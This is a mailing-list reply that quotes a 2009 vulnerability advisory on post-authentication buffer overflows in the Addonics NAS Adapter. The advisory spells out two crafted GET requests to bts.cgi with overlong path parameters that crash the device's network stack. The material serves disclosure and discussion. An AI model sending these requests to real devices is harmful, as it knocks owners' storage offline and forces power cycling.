Have any of these buffer overflows been debugged and/or proven exploitable? Is debugging practical on this device? More details may suffice the mind.
On Mon, Apr 20, 2009 at 4:12 PM, <[email protected]> wrote: > Remote: Yes > Local: No > Credit: Mike Cyr, aka h00die > Vulnerable: NASU2FW41 Loader 1.17 > Not Vulnerable: > > Discussion: > > Addonics NAS Adapter Post-Auth DoS > > Addonics NAS Adapter is prone to several post authentication buffer > overflows. Each of these buffer overflows will crash the entire TCP/IP stack > and the device will have to be power cycled to restore any functionality. > Addonics currently has implemented GUI level (client side) controls for > preventing long inputs, but by simply doing a direct HTTP GET request (the > device doesn't use POST) this can be bypassed. > > Addonics was notified of the buffer overflows via ticket 497283 on March 25, > 2009. Vendor acknowledgment on March 26, 2009. > > Exploiting these issues will crash the network stack and create a Denial of > Service condition. > > Firmware NASU2FW41 Loader1.17 are vulnerable; other versions may also be. > > Exploit: > > http://www.milw0rm.com/exploits/8490 > > Attackers can use a browser to exploit these issues. > > The following GET requests will result in the TCP/IP stack crashing and the > device requiring a reboot > > 1. Bittorrent: Download Path > > http://<ip>/bts.cgi?redirect=bt.htm&failure=fail.htm&type=bt_search_apply&torrent_path=&download_path=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa > > 2. Bittorent: torrent path > > http://<ip>/bts.cgi?redirect=bt.htm&failure=fail.htm&type=bt_search_apply&torrent_path=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&download_path=PUBLIC > > > > References: > > Vendor/Product Website: http://www.addonics.com/products/nas/nasu2.asp >
